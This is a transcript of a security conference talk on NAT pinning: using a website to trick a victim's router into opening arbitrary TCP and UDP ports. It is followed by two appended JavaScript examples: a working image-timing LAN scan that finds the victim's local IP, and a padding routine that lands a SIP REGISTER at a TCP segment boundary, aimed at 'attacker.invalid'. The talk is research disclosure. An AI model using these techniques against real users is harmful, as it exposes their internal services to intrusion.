All right everyone, it is my honor to introduce Samy, who is a longtime friend of ToorCon and who will be speaking about bypassing NAT. Without further ado, Samy.

I hope you'll forgive me, I'm a little under the weather, but I am excited to be here and I have a lot of great stuff to share with you guys. We're gonna talk about NAT pinning, and I realize I have a lot of information here, so we'll zoom through a little. Happy to do Q&A after. But first let's talk about what NAT, network address translation, is. Most of us have routers at home. I mean, most of our networks at home probably look kind of like this. The idea of NAT is that we're essentially running out of IPv4 space, and IPv6 is coming, so that's what they tell us, any time now, any day now. And the idea of NAT is that because we're running out of IPv4 space, or public IPs, what we can do is essentially have our router here, and that can give us internal address space, so a 10-dot network or a 192 network, that is not actually routable on the public internet. However, we can have multiple devices all sharing a public IP address that then reaches the internet.

And the idea of NAT pinning... actually, one of the benefits of routers is that they essentially act as a firewall. If you have a bunch of services running on your machine and someone tries to, say, connect to your machine from outside, from the public internet, they can't, because your router is blocking it: your router needs to know who this is supposed to go to, unless you have port forwarding or DMZ or some sort of feature enabled. Now, why is this a big deal? I ran lsof on my machine a couple days ago, and this is what came up. All these services are listening essentially publicly, on my public network device. So that means, I don't know, I have Node servers running. I don't know why Node is running.
I don't know why Node is running. CrashPlan is my backup service. Sonos, I don't even have a Sonos yet, and Sonos is listening on my computer and has an open service. Why is that happening? So many of these tools are gonna have vulnerabilities in them, so it's always interesting to see if we can attack those services.

The idea of NAT pinning is something I demonstrated maybe nine or ten years ago, and that was a very basic proof of concept where essentially a victim would go and visit a malicious website on the internet, that website would send some data back to the user, the user would execute some code in their web browser, and then open up a port on their router. Now the way that essentially happened is through something called connection tracking. Connection tracking is something we may have seen with FTP; FTP is a good example. Many of you have used FTP, hopefully no one uses it anymore. FTP allows you to transfer files, so you can FTP to an FTP server and you'll say, hey, I want to receive this file. But the way that happens is that it actually uses a second port: what your FTP client does is open a secondary port, and the FTP server will connect to that port. The problem is when routers came out, that broke, because now your router says, I don't know what this port 1234 is, so why would I connect to this?
So routers then introduced something called connection tracking, or an application level gateway. An ALG will say, oh, I'm a router, I see someone on my internal network wants to do FTP, and they said, oh, connect back on port 123, so I will open port 123 for them. So initially, when I'm looking into how a protocol works, the first thing I do is read the RFC. RFCs are essentially how protocols are built. It doesn't necessarily mean protocols are built this way, but it's a good foundation to base things off of.

In 2010, when I was initially demonstrating how this technique worked, I tried FTP. I found that the browsers had various restricted ports, so I actually couldn't connect to FTP, and IRC was another tool that I wanted to use. Let's see here. Excuse me. Oh, so what I wanted to do was essentially act as an IRC client. The nice thing about IRC is that it's similar to HTTP in that it's a newline-based protocol. When you're on HTTP and you reach a web server, you say GET / HTTP/1.0, carriage return, newline; all of these are newline-based, and IRC is another newline-based protocol. Just like FTP, IRC has something similar, where you can say, hey, I'm going to DCC chat you, I'm going to DCC send you a file, and you're going to connect back to me on this port. And your router again has an ALG for IRC DCC, so your router sees that message and is going to open up the port and then port forward back to you, if you're using an IRC client to send this DCC message. So I was thinking, couldn't I just create a web form that connects to an IRC server? But really it's just a random server on the internet on the IRC port, 6667, and then we say I want to send a DCC, because you can force someone's web browser to submit a form, and you can make it do that to any port, except for the fact that browsers restrict ports. An interesting way around that, in 2010, what you could do is:
TCP ports and UDP ports are 16 bits wide, 65,536 possibilities. However, the browser itself is dealing with strings. So if you added one bit, let's say you created a 17-bit port and the highest bit was a one, you have a port that's larger than 16 bits. What would happen is your browser would say, is this a restricted port? No, I don't know this port, whatever port number it is. In this case, I don't think I have it written down here, but let's say I want to connect to port 6667. If you had 65536 plus 6667, you have some much bigger number, and your browser will see that and say, oh, that's not in my restricted port list. Then it will send it on to the TCP/IP stack, which is only going to take a 16-bit number, and you just bypassed the port restriction. So you can now connect out to any restricted port from the user's browser.

This is essentially what an IRC connection would typically look like, so what your browser is actually sending is: we take all of this data and this message, like a DCC message, and put it in the POST body, and it will POST something, and ultimately your router will see that and then open a port back. I'll be happy to share the slides. This is the example code that actually performs this full attack and would open up essentially any arbitrary TCP port. Now, one thing is, when I tried this it actually didn't work, and part of the reason is that for this to work, DCC and FTP both require you to know the internal IP address. So when you're saying, hey, connect back to me, you're also including your IP address, your local IP address, and typically a browser doesn't know your local IP address. Now in 2010 there was a technology called LiveConnect. Has anyone used LiveConnect?
I'm glad to hear that. I'm glad to see this. It was Java embedded into the browser, accessible via JavaScript, and you could do some really wacky things. It was really useful for me because it allowed me to access your internal IP. It went away very quickly. So this was the LiveConnect code that would essentially allow you to access your local IP address. It was built into a couple of browsers briefly as a beta and then quickly went away. Here's the actual full code for performing this attack back in 2010. Now they fixed the port restriction, they've removed LiveConnect, so none of this stuff works today. This has always been kind of interesting to me, so I've tried to just play with this over time. Our overflow technique also no longer works.

So recently I've been looking at what other services there are that are multi-protocol, right, something that an ALG would actually look at, and I made a spreadsheet here. I went through the Linux TCP/IP stack and just collected all the different ports and services and what protocol they need to be on, and then I took a list of Chrome restricted ports. We see what Chrome blocks, and the ones that they don't block are Amanda, which is a backup protocol that nobody uses, SIP, PPTP, H.323, which is voice over IP, and SIP was pretty interesting. So I started taking a look at SIP. If you're not familiar with SIP, it's like FTP but for noise. It's a voice over IP protocol. It says you can make a connection on UDP or TCP port 5060 to some server and you say, hey, I want to make a call, an INVITE, and then on a secondary channel you'll send audio, and you can create additional channels for video. So I was thinking, okay, couldn't I reproduce that same technique, the NAT pinning technique, with SIP? Because this also supports TCP, and 5060 is not blocked based off the Chrome restriction list. So that's pretty cool. Maybe we can do that.
So I attempted to do this via the HTTP POST. I made a website, it has a hidden form, it auto-submits via JavaScript to a server that I'm running on port 5060, with the SIP packet in the POST section. Unfortunately this failed because, again, I don't know the IP address. So we actually need to know what the IP is. So I found a pretty cool thing that would allow me to grab your local IP address, and that was STUN. Essentially, new browsers have WebRTC, which allows you to perform voice over IP with other people on the internet, and partially you need to actually know the local IP address. So I was very excited when I found that you can actually use STUN and ICE to get the user's local IP address. This was really cool. Unfortunately, a couple weeks ago when I was working on this presentation for you guys, it stopped working, and that's because people realized it's a bad idea to actually show the local IP address. So all the browsers stopped doing this, and instead they replaced it. It's no longer a local IP address but rather a Bonjour or mDNS hostname that doesn't resolve except internally on your network. So this all broke. Thank you. Just kidding.

So this is an example of what it would actually look like. This was what it ended up being. So I furiously had to find an alternate solution, since this no longer works, because you can't use that .local address: when your ALG sees that, your router is gonna say, I don't know what that is. And here's a video where we'll see. We're gonna do TCP from my laptop and then we're gonna go from a server. I'm behind a router in there, and then we'll just see. Oh, we'll do netcat.
That's what we're doing. Okay, and we'll see something interesting here. When you connect to a service that isn't running, we see immediately connection refused, and that's because TCP is sending an RST back to us, because there's an IP stack that's living there. And when we connect to a service that is there, like port 80, then we get a SYN-ACK back saying, hey, I'm here and I want to connect with you. Now if you connect to an IP address that does not exist, we get nothing back. So can we use this information to help us gain an IP address?

What we can actually do is a TCP timing attack within the web browser. What if you create an image and your image connects to a random IP, let's say a router IP like 192.168.0.1? Now you don't know the victim's router IP, but we do know there's probably a handful, maybe 20 IPs, that are pretty common within routers as their gateway IP. And what if we create an image and then we have an onload and an onerror event? Now if there is a machine there, it's either going to be listening on, say, port 80, or it's not gonna be listening. If it's listening on port 80 and the image exists, that's gonna fire an on success event. If it's not listening, that's gonna fire an RST, which will fire an onerror event. If there's nothing there, an onerror will happen, but it'll happen after a few seconds. So what if we just time the amount of time from when we drop this image to when we get an on success or onerror?
And we don't care if there's something listening or not, we just want to know: is there a machine there? And we do this for, say, the top 50 possible routers, and now we know what the gateway IP address of your LAN is. So now we've just discovered, by trying 192.168.0.1, .1.1, .2.1, and so on and so forth, we tried all the 10-dots, and then we figure out what your gateway IP address is. Now we still don't know your IP, we need to know that, so then we perform the same attack, but for your subnet, and we're doing this now for every IP within your subnet and timing all of them. Well, which machine is going to respond the fastest? It's your own machine, right? Because your own machine doesn't need to go through the router. So it's going to immediately respond, and you can now determine a local IP address. So this is an example. This is entirely automated, where you visit a site, it detects what subnet you are on by testing, I probably test 300 different routers, and then whichever one is fastest, then we try all the IPs in that subnet, and then ultimately we see that we do get the local IP address. So that is pretty cool. We now know the local IP address of the user.

Unfortunately, I then tried that. I took the local IP address, I put it in the SIP packet, and then it still didn't work. So why does it fail? So I think we need to really understand how a router ALG works. So the first thing we want to do is dump firmware, if we want to really understand, right? You take your router, you open it up, and you potentially dump firmware. Just some of the tools that I like to use. That's strange. This is the wrong image. Sorry about that. That's better. That's better. Okay. So I like to actually use my phone whenever I'm investigating hardware, right? If I'm looking at hardware, I like to take pictures with it. Right, I can take big pictures.
You can zoom in. You can use the flashlight to often look through a PCB to follow traces; it's very useful if you put it on the bottom of a circuit board, that will help you find things. You should be looking at the names of all the chips on here. So if you open up your router, you can look at all the chips, look at the names, find the datasheets. Many, almost all of these, well, many of these will have public datasheets. If I'm trying to dump firmware or attack a chip some other way, micro probes are super useful, logic analyzers are super useful, and if you're glitching, tools like ChipWhisperer from Colin O'Flynn are super useful. And then also going online looking for binaries. If you can find binaries, or you extract them from the device itself, then use a tool like binwalk, which will look for different binaries and file types within a larger image. So it'll say, oh, you have an LZMA or you have a SquashFS file system here. And once you know that, you can use binwalk -e, or you can use a separate tool like unsquashfs, to extract that and then access the files inside. Once you have access to the files inside, then you want to kind of look around. Excuse me.

So I was looking around to see, all right, I know my router does FTP and SIP, so let me just look around the file system and see what does it do with FTP and what does it do with SIP. Because the SIP technique that I think should work... I know voice over IP calls work, so my router clearly has the ALG enabled, yet when I attempt my attack from the browser it no longer works. So what's going on here? So I did an unsquashfs, pulled out the file system, went through, looked for different FTP files. I have a bunch of different tools I'm using; I've also linked to all of them in the bottom right here, so I can make this presentation available. Excuse me. And I also wanted to start using this tool, Ghidra.
Let me know how it's pronounced. Ghidra? Ghidra, how do you know? Do you work... no, are you with the NSA? Somebody else already told you. Hmm. And I love that when Ghidra, this tool, came out, the NSA released this reverse engineering tool, and it was around the same week that Microsoft saw this and was like, oh, we're gonna open source Calculator in response. So Calculator came out as open source as well, which is pretty cool. So with Ghidra, am I pronouncing it right? I apologize. Ghidra, okay. My head is not great right now, I apologize.

So in Ghidra we're taking a look at one of the files that matched FTP, just the word FTP. It was a kernel object, a .ko. So I was like, oh, there's gonna be some cool stuff in there, and we start taking a look, and then I'm like, okay, what other decodes are there? What other ALGs does this router support? And of course we found a SIP decode. So now we're looking around for the SIP decode to see how it works: under what conditions will my router say, oh, this is a SIP packet, versus this is someone just doing whatever random other traffic? And interestingly, we see something here where it's doing an INVITE. In my SIP example I was doing an INVITE or a REGISTER, and here it's actually doing a strncasecmp, a case-insensitive compare. And what's interesting about this is that the INVITE or the REGISTER must be at the beginning of the data portion of the packet. So now in a TCP packet, if you're doing this weird thing through HTTP POST, your packet is actually going to begin with POST / HTTP/1.0, Host: whatever, User-Agent: whatever, and then the POST data. So unfortunately I can't control the beginning of the packet. The browser has full control of the beginning of the packet; I only have control of the middle of the packet, which is the POST data. So I'm thinking, okay, what else can we do?
How can I maybe perform some sort of raw socket within the web browser? So I started taking a look at Chrome flags and experiments. It's always interesting to see what are the new protocols that are supported, going through that stuff, what features does it have. And looking at sockets, here's the Chrome source code, going through here. I was going through the W3 website and then I found this page. We're trying to understand a protocol and it's like: What is topic? Explanation. What is topic used for? Explanation. There's not much explanation there. But most of their documentation actually is really good. After going through, I found some protocols that my browser supports, which are HTTP, HTTPS, FTP, WebSocket, DNS, SPDY, STUN, ICE, a couple others. Nothing that really allowed me to control the very beginning of the packet, which is what I need to potentially perform this attack.

But then I was looking at UDP STUN, and I was playing around with that, because STUN, TURN, and ICE are all used to understand what kind of NAT you're using so that WebRTC can then properly perform voice over IP and video communication. And I started playing with STUN, and I found that I can actually set a username for a packet, to authorize that STUN connection, and that username can actually be as long as I want. So you can just send really, really, really long packets in UDP. Now what's interesting about this is that ultimately you have a limit on how long a packet is, but the browser itself didn't limit it. So that means it's your IP stack now limiting it, and when your IP stack limits it, in this scenario for UDP, it then does IP fragmentation. So once you're over the boundary of the first packet, it then creates a secondary packet where you now control the beginning of that packet. So as long as you know what the size of that packet is, which you can determine in a test case, you can now do essentially arbitrary UDP packet injection on the second packet.
That's pretty cool. The only problem with the ALG is that when it sees a SIP UDP packet, it will only allow you to then open a UDP port, and UDP ports are fun, but I'm really more interested in TCP ports. That's where all the juicy services are running. So we now actually have the ability to do UDP packet injection, and this technique works for UDP, but the problem is I need to do this for TCP. So what if we just sent a really, really, really long form? This is an actual POST from my Chrome web browser. So I just sent a POST. I bolded the parts that I control, right? So I control the URL, I control the cookie, and then I control the form data itself. So I just sent a ton of data, and I somehow photoshopped a weird thing there, I don't know why, and then I sent my SIP packet, in this case it's a REGISTER packet. And what's really interesting is that you can perform the same exact attack. So what you do is you create a really, really long packet, and you are listening on the other side on port 5060 on TCP now, and on TCP you get this packet and then you see where does it break up. And you can actually kind of control where it breaks up, because TCP has a feature called... MTU sizes? I'm sorry, that's Ethernet. Ethernet has MTU sizes, you want a smaller MTU, but TCP has a... man, what? MSS? Yeah. Was it message segment size? Segmentation? Maximum segment size.
Thank you. So when you're actually receiving a TCP SYN from someone, you can then respond with an MSS in the options and say, I will only accept packets of this size, and then you already know the size of the packets that the browser is going to send. I did find that some browsers, specifically Firefox and one other one, would alter the width of this WebKitFormBoundary, which is the boundary of the POST data for this specific form. It would only do it by a few bytes, so I found that intermittently this would not work, you would not know the proper size. And what you can do is you listen on the other side and you say, oh, that was off by one byte, send that data back to the browser over a WebSocket, tell them, hey, you were one byte off, try again, and you do this feedback loop, and within five tries you then send this POST, this extra data, and you create a new TCP packet, essentially with full arbitrary control of the data portion. Ultimately, this allowed me to re-perform the same exact attack, and you now have entirely arbitrary TCP and UDP packet injection control within your browser, which also means you can then open up any TCP or UDP port on that victim just by them visiting a website. You can then connect back to any service that they're running, which is pretty cool. And I think that's it. I think this is an example of connecting to a MySQL server that's on my computer. So it's entirely automated. I'd be happy to share any details or answer any questions.

Yeah, cool, we have a minute and 50 seconds. Any questions? Yes.

Oh, that's really interesting. I don't think it would work on a VPN provider because, hey, I don't think I'm even gonna get their IP address. I don't know. I'm not sure. That's a good question. Anyone know? Yeah, I don't know if they're doing ALG. I wonder if they are. I'm not sure.
Yeah, that'd be interesting to see. Yes.

I think that's what's interesting to me, is that I don't think it's a bug, right? This is just, all you're doing is you're abusing multiple protocols, right? You're telling your browser to behave like a SIP client, and your router sees what appears to be a SIP client talking on the SIP port with a valid SIP packet. Everything looks correct. So I don't consider this a bug, right? I consider this just an abuse of multiple protocols. So no one's at fault. Yes.

You can do it multiple ways. I mean, on the ALG, like, browsers are probably just gonna keep on closing ports. I don't think that's the correct... that's the real solution. I don't necessarily think it's the browser's issue either. I don't know. You could have a more strict ALG on your router that says, oh, I shouldn't, like... I don't know, man. That's tough, because you don't want to drop an ALG just because someone sent an invalid packet, because if there's an update to a protocol and your router didn't get that update and now you see an incorrect packet, like, I don't think you should drop all ALG support. So I honestly don't know the answer. I haven't really thought about it. Yeah, okay.

Thank you so much, everyone. If anyone has any further questions, Samy will be outside on the patio. And last reminder: if you are doing skydiving tomorrow, go to registration basically right now and sign up for that.
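Editor's added example, not code from the talk or its slides: the image-timing scan the speaker describes for finding the gateway and then the victim's own address. The scan logic takes the probe function as a parameter so it can be exercised offline; `imageProbe` is the browser-side version built on an `<img>` onload/onerror race with a timeout. The gateway list, the /24 assumption, the concurrency value and the half-timeout threshold are all assumptions of this example.

```javascript
// Added example (not from the talk). Assumptions: common default gateway
// list below (constructed), /24 subnets, and that a live host answers the
// probe well under the timeout while a dead address runs the timeout out.
const COMMON_GATEWAYS = [
  "192.168.0.1", "192.168.1.1", "192.168.2.1", "192.168.1.254",
  "10.0.0.1", "10.0.1.1", "10.1.1.1", "172.16.0.1",
];

// Browser-only probe: how long until the image fires onload or onerror.
// A listening port gives onload (or a fast onerror on a non-image body),
// a closed port gives an RST and a fast onerror, a dead address gives
// nothing until the timer runs out. Either way, time-to-event is what we use.
function imageProbe(ip, port = 80, timeoutMs = 3000) {
  return new Promise((resolve) => {
    const img = new Image();
    const start = performance.now();
    const timer = setTimeout(() => { img.src = ""; resolve(timeoutMs); }, timeoutMs);
    const done = () => { clearTimeout(timer); resolve(performance.now() - start); };
    img.onload = done;
    img.onerror = done;
    img.src = `http://${ip}:${port}/x?${Math.random()}`; // cache-buster
  });
}

// All host addresses in the gateway's /24 (assumption: a /24 subnet).
function subnetHosts(gateway) {
  const prefix = gateway.split(".").slice(0, 3).join(".");
  const hosts = [];
  for (let i = 1; i < 255; i++) hosts.push(`${prefix}.${i}`);
  return hosts;
}

// Time every candidate with a small worker pool; return fastest-first.
async function timeAll(candidates, probe, concurrency = 16) {
  const results = [];
  let next = 0;
  async function worker() {
    while (next < candidates.length) {
      const ip = candidates[next++];
      results.push({ ip, ms: await probe(ip) });
    }
  }
  await Promise.all(Array.from({ length: concurrency }, worker));
  return results.sort((a, b) => a.ms - b.ms);
}

// Step 1: the gateway is the common address that answered at all (well under
// the timeout). Step 2: inside that subnet the fastest answer is the victim's
// own machine, because that probe never crosses the router.
async function discoverLocalIp(probe, timeoutMs = 3000) {
  const answered = (await timeAll(COMMON_GATEWAYS, probe))
    .filter((r) => r.ms < timeoutMs / 2);
  if (answered.length === 0) return null;
  const gateway = answered[0].ip;
  const [self] = await timeAll(subnetHosts(gateway), probe);
  return { gateway, localIp: self.ip };
}
```

In a page you would call `discoverLocalIp(imageProbe)`; the probe runs concurrently, so on a real LAN it is worth clamping `concurrency` to what the browser's per-host connection limits allow, otherwise queued requests inflate the timings and the "fastest" host is chosen by luck.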
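Editor's added example, not code from the talk or its slides: a simulation of the TCP part of the technique, where a long multipart POST is padded so that the SIP REGISTER lands exactly at the start of a TCP segment, and the listener feeds the measured offset back until it does. The request skeleton, the boundary string, the sample REGISTER and the "sender fills every segment to exactly MSS bytes" model are all assumptions of this example; a real listener measures the offset on the bytes it reads from the socket and returns the correction over a WebSocket.

```javascript
// Added example (not from the talk). Assumptions: fixed request skeleton,
// fixed boundary, and a sender that cuts the stream into full MSS-sized
// segments after the listener advertised that MSS in its SYN-ACK.

// Constructed sample payload the router's ALG should recognise.
const SIP_REGISTER =
  "REGISTER sip:example.invalid SIP/2.0\r\n" +
  "Via: SIP/2.0/TCP 192.168.1.2:5060\r\n" +
  "Contact: <sip:victim@192.168.1.2:5060;transport=tcp>\r\n" +
  "Call-ID: 1@192.168.1.2\r\n\r\n";

const BOUNDARY = "----WebKitFormBoundary7MA4YWxkTrZu0gW";

// What the browser puts on the wire for a multipart POST holding one padding
// field followed by the field carrying the SIP request.
function buildPost(paddingLen, boundary = BOUNDARY) {
  const body =
    `--${boundary}\r\nContent-Disposition: form-data; name="pad"\r\n\r\n` +
    "A".repeat(paddingLen) + "\r\n" +
    `--${boundary}\r\nContent-Disposition: form-data; name="sip"\r\n\r\n` +
    SIP_REGISTER + "\r\n" +
    `--${boundary}--\r\n`;
  const headers =
    "POST /submit HTTP/1.1\r\n" +
    "Host: attacker.invalid:5060\r\n" +
    `Content-Type: multipart/form-data; boundary=${boundary}\r\n` +
    `Content-Length: ${body.length}\r\n\r\n`;
  return headers + body;
}

// Cut the byte stream into MSS-sized TCP segments.
function segments(data, mss) {
  const out = [];
  for (let i = 0; i < data.length; i += mss) out.push(data.slice(i, i + mss));
  return out;
}

// The ALG check as described in the talk: a case-insensitive method name at
// the very start of a segment's data portion.
function algSeesSip(segment) {
  return /^(INVITE|REGISTER)\b/i.test(segment);
}

// Listener side: find the SIP request in the received stream and report how
// many bytes past a segment boundary it starts (0 means aligned).
function misalignment(data, mss) {
  const at = data.indexOf(SIP_REGISTER);
  return at < 0 ? null : at % mss;
}

// The feedback loop. Each round the listener measures the offset and the page
// grows the padding so the request lands on the next segment boundary. One
// correction is not always enough: the boundary string can change width
// between submissions and the Content-Length digit count can grow.
function alignPayload(mss, maxTries = 5, boundaryFor = () => BOUNDARY) {
  let padding = 0;
  for (let attempt = 1; attempt <= maxTries; attempt++) {
    const data = buildPost(padding, boundaryFor(attempt));
    const off = misalignment(data, mss);
    if (off === null) return null;
    if (off === 0) {
      return { padding, attempt, segment: segments(data, mss).find(algSeesSip) };
    }
    padding += mss - off; // tell the page: add this many bytes and resubmit
  }
  return null;
}
```

`boundaryFor` stands in for the browser jitter the speaker mentions: pass a function that returns a slightly different boundary on some attempts and the loop needs an extra round, which is exactly why the listener keeps correcting instead of computing the padding once.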